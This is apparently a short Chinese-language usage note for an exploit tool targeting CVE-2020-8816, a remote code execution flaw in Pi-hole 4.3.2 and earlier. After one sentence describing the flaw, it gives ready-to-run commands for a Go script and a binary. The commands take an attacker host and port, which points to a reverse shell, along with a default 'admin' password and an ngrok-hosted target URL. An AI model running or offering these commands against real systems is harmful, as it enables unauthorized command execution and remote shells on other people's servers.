Pi-hole(版本 <= 4.3.2)受远程代码执行漏洞影响。经过 Web 门户认证的用户可以以运行该服务的本地用户的权限,在底层服务器上执行任意命令。
go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/
或下载二进制文件 CVE-2020-8816 :
./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/